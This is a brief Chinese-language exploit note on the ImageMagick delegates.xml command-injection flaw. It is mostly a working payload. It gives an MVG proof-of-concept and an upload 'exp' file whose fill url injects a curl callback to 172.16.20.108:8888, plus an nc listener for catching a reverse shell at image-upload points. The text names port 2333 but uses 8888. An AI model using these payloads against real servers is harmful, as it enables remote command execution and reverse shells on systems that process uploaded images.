漏洞簡介:/etc/ImageMagick/delegates.xml 將%s,%l加入到command里造成了命令執行
利用方式:
poc代碼:
push graphic-context viewbox 0 0 640 480 fill 'url(https://"| command")' pop graphic-context
圖片上傳點,抓包,附上exp代碼:
push graphic-context
viewbox 0 0 640 480
fill 'url(https://"| curl 172.16.20.108:8888")'
pop graphic-context
ip:你要反彈的shell地址,2333端口號,服務器監聽反彈shell。
nc -lvp 8888